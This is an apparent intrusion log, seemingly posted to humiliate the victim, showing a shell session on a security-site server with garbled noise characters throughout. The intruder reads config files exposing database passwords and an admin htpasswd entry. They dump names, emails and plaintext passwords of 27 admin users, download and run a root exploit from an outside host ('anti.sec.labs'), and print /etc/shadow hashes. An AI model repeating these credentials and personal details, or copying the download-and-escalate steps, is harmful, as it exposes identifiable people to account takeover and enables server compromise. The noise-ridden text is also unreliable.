- |! b8 Q7 W' Y& v' n% [drwxr-xr-x 7 astanet astanet 4096 Jan 5 2006 _0mysql- A) g6 n# I- B$ o* E2 y: g8 ~
drwxr-xr-x 7 astanet astanet 4096 Dec 22 14:16 链接标记astanet@astalavista.com2 S8 V" S) Y* \5 C/ M
drwxrwxrwx 2 astanet astanet 4096 Jan 5 2006 backend
( C2 i. l4 D, ~5 D# C1 E' y* I2 G* Ddrwxr-xr-x 2 astanet astanet 4096 Oct 24 2006 banner
7 [$ e- I/ U8 J, r# K; J0 I-rw-r–r– 1 astanet astanet 25724 Apr 4 2006 banner.jpg( _+ U5 f& P8 B+ Y
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 config5 n, Q6 B3 D1 L0 d
drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 cron( K9 F2 Y4 Y) j; n% Y( T
drwxr-xr-x 11 astanet astanet 4096 Jan 5 2006 dvd4 \* r: `, O) S+ C2 D
-rw-r–r– 1 astanet astanet 36 Jan 5 2006 error.php2 w5 O* X3 m( p( s }, |1 d0 n
-rw-r–r– 1 astanet astanet 1406 Jan 5 2006 favicon.ico
" J7 r6 l( [: k4 adrwxrwxrwx 2 astanet astanet 4096 Dec 15 2006 feed
! ]1 W- J% @$ t& _- mdrwxr-xr-x 3 astanet astanet 4096 Dec 8 2006 flashtour
4 N$ u; I8 Y$ o& d% y7 c; @ l. M-rw-r–r– 1 astanet astanet 18 Jan 5 2006 htaccess
* Y) }; P: E7 t. I) o-rw-r–r– 1 astanet astanet 585 Mar 24 14:50 .htaccess7 S7 g# U2 w" l2 ^6 ~' \* r
-rw-r–r– 1 astanet astanet 398 Jan 5 2006 index1.php+ x" N+ K1 g' |6 m8 D8 n
-rw-r–r– 1 astanet astanet 1036 Jan 5 2006 _index.html4 A3 X& `7 ^ S, b. K
-rw-r–r– 1 astanet astanet 6880 Dec 23 14:44 index.php
% S7 y4 X' ?$ u" b4 }-rw-r–r– 1 astanet astanet 676 Mar 21 2006 index_redirect.php
4 T' X" S6 x" X! y3 m-rw-r–r– 1 astanet astanet 739 Feb 24 2006 index.swf# y8 W) s& E# @7 [2 m6 S# k
drwxr-xr-x 4 astanet astanet 4096 Oct 18 2006 irc
2 m# A' z& d1 \% @- G7 Wdrwxr-xr-x 4 astanet astanet 4096 Aug 11 2006 lang3 S$ R. Q0 \: s- l$ d3 \" I( P
drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 lib3 H" I5 e0 K, I& `9 [' s
drwxr-xr-x 6 astanet astanet 4096 Aug 11 2006 log
# I) w- \ Q9 e$ L7 w9 ?% Edrwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 member4 j$ {) p$ K2 y" R2 M, ]. f+ v
drwxrwxrwx 5 astanet astanet 4096 Jun 4 00:03 memberdata
2 o, [: r9 `# g# }! V4 _drwxr-xr-x 2 astanet astanet 4096 Jan 5 2006 new
0 O1 v, F F4 @$ m( n0 ?-rw-r–r– 1 astanet astanet 7219 Feb 24 2006 pix1.swf6 j' i/ E- ] g. @
drwxr-xr-x 2 astanet astanet 4096 Oct 27 2006 re3 m. h$ Y) y$ _+ u
-rw-r–r– 1 astanet astanet 23 Jan 5 2006 robots.txt! i( j& y4 h. \% b# M1 X
drwxr-xr-x 3 astanet astanet 4096 Aug 11 2006 rss7 r$ n5 d( r2 Z' |1 c5 J
drwxr-xr-x 39 astanet astanet 4096 Dec 13 2007 sources
' d2 l3 c/ A9 i( ]3 P# _/ Ldrwxrwxrwx 3 astanet astanet 4096 Feb 2 15:40 temp_com+ s! w4 E7 T Z$ k& g/ [
drwxr-xr-x 7 astanet astanet 4096 Aug 11 2006 themes( P& n5 @6 N8 |7 S/ Q
drwxr-xr-x 2 astanet astanet 4096 Mar 14 2008 tmp_src
+ X$ M0 |6 k3 w' P0 A9 x0 r3 \drwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 tpl
5 J6 p1 E+ J6 n; b% {. y3 {drwxr-xr-x 3 astanet astanet 4096 Sep 7 2006 v2" K* L) |( }, H& Y2 h; l+ B
drwxr-xr-x 16 astanet astanet 4096 Jul 5 2006 v2_old c# K( P1 h. O- O
-rw-r–r– 1 astanet astanet 35 Dec 4 2006 webcash.php; B, m( N& w: ]/ A, e9 {
drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 wiki
5 K3 j9 j, y3 r- @: H
5 L; c5 w, ~' q! X# I0 ?# _& A1 ssh-3.2$ head -20 index.php
5 M& m# \4 d1 v# u; m6 D+ e H<?PHP4 f. h# B; ~* {' Q
/**
' S) Z- l3 u r* Mainfile (external) for astalavistaNET v2.0/ }6 w' x3 A: s) \! R
*
6 I/ A# h! f# [" u( N/ d- x* @copyright Astalavista IT Engineering GmbH: v* B" C0 R5 | d W$ ~* g: M8 r. j
* @author Thomas Kaelin <链接标记thomas.kaelin@astalavista.ch>
( m# y8 O( R4 N9 l9 g/ E* @version 1.0
$ X& z5 X3 ]' J2 r% C*/
' S% j' Y& J+ o4 ~. M: c/ U5 n8 {2 t8 D7 L; g+ j. \, a
if ($_SERVER['PHP_SELF'] == ‘/webcash.php’) {
! g" s' c7 s0 X9 M $dontStartSession = false;
9 Q7 ?& R$ _ G0 S: e- q } else {" G1 } ?; @' A. m8 V
$dontStartSession = true;; t( c: X/ e4 u4 d
}3 p& I% L# B( x* x: N! X
require_once($_SERVER['DOCUMENT_ROOT'].’/config/com.conf.php’);
4 l! Z; y' D* @7 Z" y5 l require_once($_SERVER['DOCUMENT_ROOT'].’/config/ext.conf.php’);
4 Y) [4 K! |+ z; k require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’com.class.php’);
8 Z* Y( ~* Z, M1 o4 B require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’ext.class.php’);5 {1 @4 q, d; @% C" {/ N
- X, H( }9 G9 B/ y
sh-3.2$ cd config
9 w' p9 g ~, z R; z' E. b, Rsh-3.2$ ls -la4 H% ?6 @8 c' G1 c3 m
total 32/ L) b! y9 M7 m4 i) |
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 .6 r0 G) z* p* \- F; W i
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..6 G; j$ O2 C m: R! X7 N
-rw-r–r– 1 astanet astanet 987 Aug 11 2006 adm.conf.php/ T( Y1 n: ]( a# A1 ^2 t
-rw-r–r– 1 astanet astanet 4937 Dec 23 15:48 com.conf.php
. B+ l' {1 V% j* V-rw-r–r– 1 astanet astanet 913 Aug 11 2006 cron.conf.php0 W( o3 `+ C( L! U0 Q# `
-rw-r–r– 1 astanet astanet 1668 Aug 20 2008 ext.conf.php
) V. _ l+ Y# [: o7 _( l-rw-r–r– 1 astanet astanet 2724 May 30 2007 int.conf.php$ ~& J4 r: L: u4 ]7 n9 m* {
5 l7 y6 N+ w. x ?, Bsh-3.2$ cat com.conf.php
8 V8 K2 l# ^3 g) j[snip]
* S7 k0 H, u$ |/ ?% A5 R- N1 a//member-database
" _" f* Z* @/ H H5 h% I J& v$_CONFIG['db_mem_server'] = ‘localhost’;3 \ x8 S, e% a O, U
$_CONFIG['db_mem_database'] = ‘astanet_membersystem’;
: a3 q8 m" U8 c P$_CONFIG['db_mem_user'] = ‘astanet_db’;2 X# i" i6 P% O1 t/ ]
$_CONFIG['db_mem_password'] = ‘TXwVrC7hbq’;
7 T& U; a1 e5 P$_CONFIG['db_mem_debug'] = false; //true or false
0 l0 P* v" g5 A. n/ O) Z//ads-database
3 x- J% s- D$ W' J/ A$_CONFIG['db_ads_server'] = ‘localhost’;
6 e5 M* r: c1 k# c$_CONFIG['db_ads_database'] = ‘astanet_ads’;
' n6 [/ n; w. C( y6 k8 q2 V1 D4 y$_CONFIG['db_ads_user'] = ‘astanet_db’;
4 n& M2 M% d* @7 U. t$_CONFIG['db_ads_password'] = ‘TXwVrC7hbq’;
9 p& Q' w+ w) X$_CONFIG['db_ads_debug'] = false; //true or false
% @2 e4 e5 I1 E* g4 b( V9 ]//rainbow-database
& [/ f) n* D+ E5 o$_CONFIG['db_rainbow_server'] = ‘212.254.194.163′;
; R, V& Z- \1 S2 M$_CONFIG['db_rainbow_database'] = ‘rainbow’;# D& ], d. X6 F b1 \: {
$_CONFIG['db_rainbow_user'] = ‘dinu’;, v; r: L* r5 c$ H' C7 }
$_CONFIG['db_rainbow_password'] = ‘dinudinu’;& s$ |5 i/ s) k5 `
$_CONFIG['db_rainbow_debug'] = false; //true or false% i* @$ z$ Q: ]4 j8 l
//mailing lists database( e `6 Y& q/ T6 C$ d3 c f# C$ i1 W
$_CONFIG['db_mailing_lists_server'] = ‘localhost’;
- b7 q: G }. s9 I' [4 A$_CONFIG['db_mailing_lists_database'] = ‘astanet_mailing_lists’;
) y# U s5 e4 E" h4 N' C$_CONFIG['db_mailing_lists_user'] = ‘astanet_db’;, b; J: b' k& [1 D
$_CONFIG['db_mailing_lists_password'] = ‘TXwVrC7hbq’;! a3 @! v, D6 H, C8 Y# I
$_CONFIG['db_mailing_lists_debug'] = false; //true or false
, V2 D l; `9 i% H g//paypal9 p! B4 h& _# s
$_CONFIG['sub_pp_url'] = ‘链接标记[url]https://www.paypal.com/cgi-bin/webscr[/url]’;3 l8 G( m1 x' m' N( K c! v
$_CONFIG['sub_pp_cmd'] = ‘_xclick’;' `( G3 X/ B* U
$_CONFIG['sub_pp_business'] = ‘链接标记info@astalavista.net’;
# W1 s0 y W3 K. N- A$_CONFIG['sub_pp_noship'] = ‘1′;5 w5 a( w9 b/ T/ z" {. \
$_CONFIG['sub_pp_referer'] = ‘链接标记[url]https://www.paypal.com/[/url]’;) E% Q8 g% \7 G# G
[snip]3 o% L- ?) R/ A1 e2 W
* Q# `1 L0 d% S3 S, a% l
sh-3.2$ cd ..
4 }* d7 Q' a# D# Bsh-3.2$ cd member
* K' N# K# c( e. W+ s' Tsh-3.2$ ls -la. g, t. w U7 _9 C. X
total 205 ]" k+ | f C* g
drwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 .
; X* W' Q9 ]/ p+ [4 adrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..1 D$ e' J1 a z
-rw-r–r– 1 astanet astanet 19 Jan 13 14:02 .htaccess4 p% b$ N6 L8 z% F: |
-rwxr-xr-x 1 astanet astanet 6709 Jan 13 14:06 index.php
- w, e1 n) a0 t0 n' G8 v! ~9 G1 msh-3.2$ cat .htaccess Q3 l' j4 ]) z1 y! f
SecFilterEngine off
9 F0 c/ M2 b) m1 Q( o% l- T* f. |- p: }1 o- [* G
sh-3.2$ cd ..) a' u9 C9 W& \2 Q; z. j
sh-3.2$ cd cron
" h( ^) g' v; Y8 H8 H/ Ish-3.2$ ls -la
% B2 o8 v* T3 O- ?; b- Gtotal 168" e- r% d; J! k+ d9 {& f
drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 .# d7 d% f0 m+ y/ n
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
8 m& F+ E) d. K8 x( K-rw-r–r– 1 astanet astanet 1272 Jan 12 08:24 0_corefile.php
# x- |1 d4 R1 l9 J! d-rw-r–r– 1 astanet astanet 2356 Aug 11 2006 0_functions.php
: I. W( Q; r6 U5 ?. y! T7 C) O- |7 E-rw-r–r– 1 astanet astanet 3616 Dec 23 15:44 1_daily.php$ n$ K/ s4 e9 ^9 l5 W; b3 x0 d
-rw-r–r– 1 astanet astanet 527 Aug 11 2006 1_fivemin.php$ g+ g" q2 w) Q. g3 o
-rw-r–r– 1 astanet astanet 5006 Dec 23 15:39 1_hourly.php
, n; f& ^% e. M4 T+ ?, R-rw-r–r– 1 astanet astanet 432 Aug 11 2006 1_weekly.php1 q: U; u. T$ i8 v x
-rw-r–r– 1 astanet astanet 2277 Aug 11 2006 2_advertising.php) q3 G; j1 d( f3 y8 z4 K' b
-rw-r–r– 1 astanet astanet 4882 Dec 23 15:40 2_archives.php. o: L1 R J/ d1 U
-rw-r–r– 1 astanet astanet 3784 Aug 16 2006 2_awstats.sh2 q& M+ T2 P8 y% ~# z! }# b
-rw-r–r– 1 astanet astanet 14894 Jan 12 08:51 2_expire.bak.php. l4 Q1 H; D3 o" V( D- ^+ y+ ~$ D, o
-rw-r–r– 1 astanet astanet 14979 Jan 12 09:10 2_expire.php4 k. @( R# ^8 [) F7 D( \: A
-rw-r–r– 1 astanet astanet 7657 Aug 15 2006 2_exploitree_updater.php$ [" R4 E) d5 Z7 y' K# |
-rw-r–r– 1 astanet astanet 686 Dec 23 16:31 2_filesize.sh
4 j" o1 k* T9 b0 _-rw-r–r– 1 astanet astanet 9853 Aug 11 2006 2_keywords_old.php
& L3 w) Y/ G/ u& I-rw-r–r– 1 astanet astanet 15664 Sep 22 2006 2_keywords.php* P" W) h% g+ A- l* ]
-rw-r–r– 1 astanet astanet 1233 Aug 11 2006 2_proxy_checker.php. q" R0 {0 H7 T% @ L- x
-rw-r–r– 1 astanet astanet 7558 Aug 11 2006 2_proxy_collector.php
2 X- U4 q& V& ~" x" G. D$ h+ d. K! u-rw-r–r– 1 astanet astanet 796 Aug 11 2006 99_create_emails.php
+ V# V1 T' ]; I0 p( [2 m+ P, r7 vdrwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 99_lang_email
2 \& Y! d7 i: `) b-rw-r–r– 1 astanet astanet 9622 Jan 6 16:04 login_reminder.php
8 _% p6 x# g4 H$ ~ R9 \# z-rw-r–r– 1 astanet astanet 9620 Jan 6 16:05 login_reminder_test.php) B5 H0 `/ c6 \3 f# _
* f8 T" X! r; a) _: d9 A; @ \
sh-3.2$ cd ..
1 b* E$ g. J. q8 vsh-3.2$ cd _007# e8 F( ^( G2 V* t1 @: ^4 P
sh-3.2$ ls -la9 }/ v% h1 p) Q' T% C
total 242 j) ^. j R! G" R; P3 f* X2 m
drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 ." v+ E- x& D1 V' t
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
. I4 g: e6 Y) t. h, J-rw-r–r– 1 astanet astanet 96 Dec 23 15:17 .htaccess
9 T& Q1 \; z4 f3 r; N-rw-r–r– 1 astanet astanet 3263 Jan 15 2007 index.php7 F! X9 i: J3 p( T
-rw-r–r– 1 astanet astanet 20 Dec 27 2006 info.php
& L" |1 w( l& e) y: a& r' Adrwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 sitemap- @# V8 ~4 ]" U! G+ R& p
! k: T* H' n6 }sh-3.2$ cat .htaccess
- |3 v& j4 n0 M. R! i( |authType Basic' K8 O- Z* `+ I
authName Admin
% _" n0 \6 y9 Q2 F! x$ L% AauthUserFile /home/astanet/auth/.htadm_pwd o; s1 P/ G3 A. c' L( j
require valid-user
# \; L2 W# u6 h, v, b% x9 P) X) s* Z0 F/ w5 R! t$ f
sh-3.2$ cat /home/astanet/auth/.htadm_pwd. K; U7 ]! D! j, C F
admin2net:CR0bl65MwhfT
) H, F9 u* \7 y) Q) N$ M2 N) I6 |* ]' N1 }1 W
sh-3.2$ mysql -u astanet_db -p" y" j$ b$ t0 `3 _' |6 \% f1 T
Enter password: d) J1 m$ j2 o$ p- c" |+ }; M
Welcome to the MySQL monitor. Commands end with ; or \g.: r% X( t8 H4 |. N+ r" Y, y
Your MySQL connection id is 275153
, `( q- |: G9 m# gServer version: 5.0.45-community-log MySQL Community Edition (GPL)
2 H! }+ d6 S2 u* I$ _" B3 D" {8 u% h ?1 t5 m
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
v% h3 `% e2 q, d0 W. |
7 p' `9 V+ G: `5 V3 cmysql> show databases;
7 L! U. q) g5 o# r4 G+———————–+; z# ^& F/ @8 v, W
| Database |
! e& U& M% `7 b/ q. E5 ]& ?% y# _+———————–+/ B! {: ?5 U- E6 _& ?4 X( u
| information_schema |
3 ?( e2 E1 E% n* K; K5 R| astanet_ads |
& \/ U( i* Z" {' @6 c& u0 L5 e; H| astanet_mailing_lists |
) O( c6 s' @' O4 p" R% e| astanet_mediawiki |
2 {* }5 F4 ?6 a# U| astanet_membersystem |
* ~) e& i$ o. [; o1 R| test |, |6 @+ R, |; f1 @5 Y
+———————–+ R A# g- F( O! n
6 rows in set (0.00 sec)
# z3 h4 C0 K. k, m. ^# H' v
4 Z1 F4 |& K" e9 T" G$ I. i3 L+ nmysql> use astanet_membersystem4 N1 c9 j% w% ~5 b7 t
Database changed
1 h: ?9 y/ L7 M- cmysql> show tables;
2 d2 [2 d: L/ s3 A. q9 e- W+———————————–+; N1 L$ N# K& b* W' H/ T, r
| Tables_in_astanet_membersystem |
# l; o- {+ e* p4 c3 B+———————————–+
* i) ~( |7 |/ B' k/ T! A4 b+ c" k; [| blacklist_categories |' g8 Z; x/ R( r& i0 ]. z; W0 N; m* V
| blacklist_content |: Q( X) l* R1 c$ O
| blacklist_levels |2 u8 a; w+ B1 [: D3 |
| blacklist_mcset |0 o- k! t! o- ?! L i6 E# d
| dir_categories |
& x, W* y4 i3 v& p2 f6 v# k# i- U4 o| dir_comments |
% u, r' J# g! f# E| dir_links |$ ^! z% T- V- a8 t# Y( k1 W
| dir_temp |
: ]3 W4 ?, [; f. L3 y| dir_votes |8 s0 B. G* b5 Y" H! C
| documents |
$ i. D1 N) ?: ]# h. u/ r2 e/ i% G| documents_categories |
* S. x2 c- s/ j7 c/ J$ E' Q| email_content |+ q3 p2 D# x8 k6 l( }
| email_settings |# m5 r, H$ e; w. s4 W8 q: }
| exploits | C7 [# _0 Q% x* n/ K
| exploits_categories |
- j- o- h; |7 u| exploittree_categories |
2 {% x) O2 k% ~" F5 y) n3 A| exploittree_exploits |
: v% l, s5 g" v| home_values |
0 G0 ], y& }, C" {1 p| iso_countries |
S* ?; c6 A* c! Y; Y| links_categories |# b+ d" y) F6 e9 Y
| links_records |; k7 X. X' V' t: Z5 F0 z5 J
| links_unauth |, o2 I S( K8 ?, Q' Q9 W! T
| links_votes |
) s, W& H# K6 Q! d$ w| log |/ y4 Q: J& F# a8 W$ L x/ _
| news_categories |" q' r' I. d- M2 a% W2 V
| news_comments |
) L% E) e' u" v4 g+ ^( q: E9 e| news_emoticons | z1 z6 R( O9 k
| news_latest |
8 `2 C* z8 t0 I| news_messages | V+ T4 F2 p, E ?4 n
| news_statistics |
! @. W8 h5 t' \; i. t| news_votes |7 R/ E/ f P) Z* P8 z
| prices_content |
# _6 Y- `$ E! @( L* z5 ]| prices_offers |7 N. w% m0 T2 J9 u/ N$ D
| rss_settings |. {" ^8 m' A' ^/ T
| sessions |
5 G5 K( b4 L. y& ~6 \| stats_signups |
8 A2 X+ {+ e# v2 S4 ~| u2u2 |
. i7 L" e3 u6 g2 n- j9 b8 D3 N| u2u_contact |
1 {$ m+ Y9 A3 a& Y* }7 c8 X4 V' F| u2u_settings |
- o) \- B! {% J% y) h0 y( Z| user_keywords_selected_categories |
$ B' p7 u5 } d/ S| users |- J+ l. k) ]( G1 J7 ~
| users_ipn_test |/ I' J+ X' i& ]
| users_keyword_values |
( @) L& z2 Q1 H, H3 @: F9 R, [7 i n- f| users_profile |- _2 G7 _+ V6 a' v$ |3 W. m; E9 n: S
| users_temp |
/ w8 c5 |7 \- o0 w| users_upgrade |4 M$ @# t; |5 ]1 \' u
+———————————–+
, l$ B3 [* V! f8 u2 P46 rows in set (0.00 sec)% H+ k% ?" Y& h$ I/ q9 c
+ v- j2 v- B" }+ V; h
mysql> describe users;% J% |# l" _5 ^
+————————–+————————————–+——+—–+———————+—————-+
- @ O1 b+ c: U3 B, s# W, N! ?| Field | Type | Null | Key | Default | Extra |
7 Y9 J A/ E+ O3 L+————————–+————————————–+——+—–+———————+—————-+
4 q$ d4 j- ` } E C| primary_key | smallint(5) unsigned | NO | PRI | NULL | auto_increment |( n# Y8 H- x! @/ l. g5 k( Q( d
| user | varchar(50) | NO | | | |* z% j1 f. R+ D9 G
| nickname | varchar(30) | NO | MUL | anonymous | | Y! M2 W# O4 C
| password | varchar(30) | NO | | | |1 q# j2 C8 A4 ]8 W7 G/ @- o' n
| userlevel | tinyint(3) | YES | MUL | NULL | |% H9 u" O. H ]$ p: U
| exp | int(8) unsigned | NO | | 0 | |/ I7 O. i9 N/ N, }# O1 d
| email | varchar(50) | NO | | | |- O% b R. g; L3 U
| ip | varchar(15) | NO | | 0 | |
$ N$ I0 h) ^/ H* d, P| proxy | set(’0′,’1′) | NO | | 0 | |7 U8 n/ y4 V+ v" ~, y1 B
| logtime | timestamp | NO | | CURRENT_TIMESTAMP | |, W- E& Q+ b f
| login_reminder_last_sent | timestamp | NO | | 0000-00-00 00:00:00 | |
9 V3 X+ R z- D6 G0 [& T| anz_in | tinyint(1) | NO | | -1 | |; {6 G1 b. v7 m7 j
| status | tinyint(1) unsigned | NO | | 0 | |7 t- x- F* f& ?3 b$ A. _4 W
| checked | set(’0′,’1′,’2′) | NO | | 0 | |
) }: D, T0 s, ~5 s4 w1 p| freemember | set(’0′,’1′) | NO | | 0 | |5 p3 @( y8 L7 u/ z
| ordertype | set(’transfer’,'wp’,'pp’,'mc’,'CnB’) | YES | | NULL | |) a; d. Q0 n' ?$ B
| lang | tinytext | NO | | | |: A; q$ p q, }! a, @- _2 w
| adid | smallint(6) | NO | | 0 | |
) j; Z: y! l+ |- s0 o9 G| pp_txn_id | varchar(255) | YES | | NULL | |6 Z; Z8 O/ ? \
| cnb_transaction_id | varchar(255) | YES | | NULL | |
- h( c+ N& y7 T( o| cnb_order_id | varchar(255) | YES | | NULL | |! }$ @, H: |( E9 D9 }) J3 J+ V
| cnb_user_id | int(11) | YES | | 0 | |# @/ I+ s4 A7 p; |
+————————–+————————————–+——+—–+———————+—————-+
* h' i% @9 K# O22 rows in set (0.01 sec)
" u: g6 M6 z1 e: e( E, J* N4 C! C) b( E
mysql> select count(*) as skids from users;
9 S+ U8 P. W, s: R% m$ @% p- x+——-+
9 Z) J' ]/ L( F4 n/ Y$ G, N6 x| skids |; K# \' C7 N) B: v) r
+——-+" M- P2 K' w% s; H& @# D# [
| 25199 |) i# s$ s. |5 h
+——-+* u. G3 p* _( j; }8 _
1 row in set (0.00 sec)) B0 R( P2 \3 d0 \# \- d# ~
! I& `" r0 C2 ^4 V, Nmysql> select user,nickname,password,email from users where userlevel = 1;6 \ s5 M6 L0 _/ h! X
+————————–+———————-+——————+———————————–+
% |& O' T! `' s. M| user | nickname | password | email |- {5 M' q4 O/ u3 s5 p3 F
+————————–+———————-+——————+———————————–+1 i1 r! I( _: g4 }* B- B6 \
| pascal | prozac | astaman3 | 链接标记info@astalavista.net |
; `3 E2 j/ ^: Q| Ivan Schmid | rOOtless1 | astalavista4asta | 链接标记ivan.schmid@comvation.com |
1 l8 |0 k: b2 ~7 W0 d| qreymer | Palermo | qblsw85iam | 链接标记eche@home.se |2 j1 ~. j" s1 k4 f9 p! V9 y- e
| Christian Wehrli | g0atherd | hitt?74 | 链接标记g0atherd@gmx.net |6 h: G8 v, O2 W; f+ L" }) V
| Andrew Blake | Minky | liq73uid | 链接标记a.blake@har.mrc.ac.uk |) j# ?9 T0 U2 T1 D0 Z
| Martin Wyss | dinu | kj63;cXy | 链接标记martin.wyss@astalavista.net |) m5 p) H6 N; a! \. q) H
| Leandro Nery | Timan_no_Sanco | nery2002 | 链接标记leandronery@hotmail.com |- ~5 ~3 w0 |4 P# K
| shaving ryans privates | ShavingRyansPrivates | memberboard313 | 链接标记shavingryansprivates1@hotmail.com |
. k- b# z7 U" Q% S| Gerben van der Lubbe | Spoofed Existence | Lb59eXg5 | 链接标记spoofedexistence@hotmail.com |. z8 \" B! B. |! Y/ t! w/ U6 X
| David M Lee | Daremo | icG12m03 | 链接标记daremo@hackerheaven.com | U! Y3 U! R9 z; E$ k
| David Corn | akriel | ve3uB$cUku | 链接标记akriel@fallenroot.net |
" {: x# z9 h K! t- \| Thomas Kalin | Gwanun | QwErTy123 | 链接标记thomas.kaelin@astalavista.net |
) H. w5 E$ s. z0 u! V0 e5 ?$ n| Marcus unknown | Cra58cker | hhCr4ck06 | 链接标记unknownmarcus@hotmail.com |
c x- E2 |8 f5 L| David Ellis | dellis203 | philip | 链接标记dellis@nightwatchnss.com |8 U5 v, v3 p7 R6 Y ~& [
| Lars Christian Solberg | xeor | tF3s4|Nea | 链接标记xeor@hush.com |; X) |! p2 b6 }1 f: b5 s$ n" a
| Paulo Santos | Be1er0ph0r1 | amor01 | 链接标记pmsantos@gmx.ch |7 ]" f O' B, u! e" `2 |6 }5 B t
| Thomas D?ppen | daha | asta4tom | 链接标记thomas.daeppen@astalavista.ch |
2 R3 T( C- H. {! w3 t% l| Touraj Abbasi Moghaddasi | -Crow1 | NetR0ck | 链接标记toraj.a.m@gmail.com | A1 p* ]' q4 j- K& i1 Q
| Fabius Bernet | traviser | wellenreiter100 | 链接标记fabius.bernet@astalavista.ch |
: q% b% m' x" |# `! O& P| Zachary McElroy | duder1 | dirty245dix | 链接标记mcelroyzj@yahoo.com |
0 K" B, D3 ^- Y5 f| Leron Cohen | cohen2 | leron4free | 链接标记leron@quiredmedia.com |: h7 _! ], q/ `% u" R! P
| Beatriz Pontes | anonymous1656 | pitas | 链接标记joao.pedro.pontes@gmail.com |
3 a$ ?. p2 b" S; f F| Glafkos Charalambous | anonymous2086 | si99490178$# | 链接标记nowayout@webhostline.com |5 P- o1 D& }( u0 t1 y$ |
| developer COMVATION | anonymous2402 | Ri?Q$Q$MVU | 链接标记ivan.schmid@astalavista.ch |
: l$ d( v( @! v+ z( u! _( X* w( Z! Z| Peter Fisher | cyph3r1 | testZer025435 | 链接标记cyph3r@astalavista.com |
. }/ P6 X5 m/ K; a$ ?- ~# F& Y2 u| sykadul | sykadul | ak29eral | 链接标记sykadul@gmail.com |
$ x1 s8 P8 U; U7 v" w7 s. A' r4 N- i| Ronny Janzi | commander1 | mpbdaagf6m | 链接标记ronny.janzi@astalavista.ch |1 }4 K" p t- Y1 ~7 N& y' D3 L
+————————–+———————-+——————+———————————–+
2 i2 V+ }, t; o+ `$ c27 rows in set (0.00 sec)
& ]) i1 Q. L5 }( v4 W1 H- s8 W B+ W( o& \0 O
mysql> exit;
) V9 C9 A1 v8 ~Bye
6 j# @5 _% W5 U7 L! m2 {. a% t$ y) r( h* O# u
[~] plaintext passwords? yes,* _) o/ U6 g* a
Those so called “security professionals” who charge you $6.66 / month to# T9 \1 i" G. m$ y$ v7 e
register at their hack-proof portal, save your passwords in plaintext…. m0 J6 `! G$ b! w$ J0 B
brilliant!
/ W0 g4 [: F4 @! e! p4 k, r5 ` z/ ?. M; t
[~] This been fun but we want more.
1 g/ }+ r+ v( r5 a/ q& i3 |( r6 b. E% R1 @
sh-3.2$ uname -a+ _! Z1 ~* P8 G. z2 y6 J. h
Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
) ?$ F7 c G1 \7 Xsh-3.2$ wget 链接标记[url]http://anti.sec.labs/g0troot[/url]0 n) S- E( Z9 P
–13:33:37– 链接标记[url]http://anti.sec.labs/g0troot[/url]: A1 d4 d7 m n: w: s) | ` V& H
Resolving anti.sec.labs… 13.33.33.37
4 J' ?& z" w" ]9 l9 P3 KConnecting to anti.sec.labs|13.33.33.37|:80… connected.+ |7 f( A$ O l# y2 V4 p
HTTP request sent, awaiting response… 200 OK
( i* H7 ?$ F& T5 mLength: 18200 (18K) [text/plain]
& K4 q8 a) X5 `0 Y5 _Saving to: `g0troot’0 T5 a1 H0 Z* M" ?' O* Z2 a+ r
5 ?$ P6 y: K! y3 r0 e6 v4 d
100%[=========================================================================================================================================>] 18,200 58.6K/s in
2 T- x/ E$ s* N- L' Z# ]9 r2 ?/ I; S0.3s
4 Z- ]. O8 Y' N/ S0 ?; ?
, ]2 E7 J- \* w0 U5 D: P+ \6 T" w" K18:55:14 (58.6 KB/s) - `g0troot’ saved [18200/18200]/ ?. j' C/ `7 J' ^1 s0 S$ \
1 a. k5 v7 G% q9 g+ p) R
sh-3.2$ ./g0troot -i x86_64
7 l; E6 o! C7 g' f4 W7 R: {* i. R[+] g0troot - anti.sec.labs0 P+ T" R: \9 O7 i6 U8 r
[+] Target: 2.6.18-128.1.10.el57 f1 a, T9 r; W
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]! P. K$ T/ ~" V# v
; Q+ l: [# W6 P$ p7 b[+] r00tr00t! z9 L' `) R" |
[~] Executing shell…
; P% u1 A2 f1 V6 o( u' h( @3 n# u: p
sh-3.2# id
* w# g- L8 E; E! L, ] @1 h; [uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)- D5 g+ z- N! w3 t" }1 B) f
! R3 t2 @# _: j$ r- D# Ush-3.2# cat /etc/shadow
; _0 Q& `6 d) o' V7 P4 T% d) Vroot 1$P/3ZMAgv$E9B4mX02s1Xrimj46V602.:14015:0:99999:7:::0 T$ @) Y# b, R5 G( n
[snip]
6 q: r4 o T4 M* m7 Qadmin1$sbycsEGo$d81laShnxFiziFaQMH32F.:13770:0:99999:7:::
/ Q/ }$ o& \* B& [' ijon1$5yHxRLX.$8pZs0cQLNh5uFCK3m4st1.:13777:0:99999:7:::
1 g/ O8 h. e2 l' e A, U: c; Dcom1$jEZ62nri$aDTj.1REsrYePcPBdfOQz1:13780:0:99999:7:::) q+ x% U* ~& e8 u
astanet1$YniJLAr.$NKtPNNGK9mcmz3/mLMSWC1:14235:0:99999:7:::
3 j1 N/ a6 k r' [1 a% E& v
) d3 v/ X3 _# I/ f( J4 ush-3.2# cat /etc/motd( s% s2 Z3 c9 m& j" U" Z' r# p
#####################################################. i4 |' f- u& C' _' Z. q
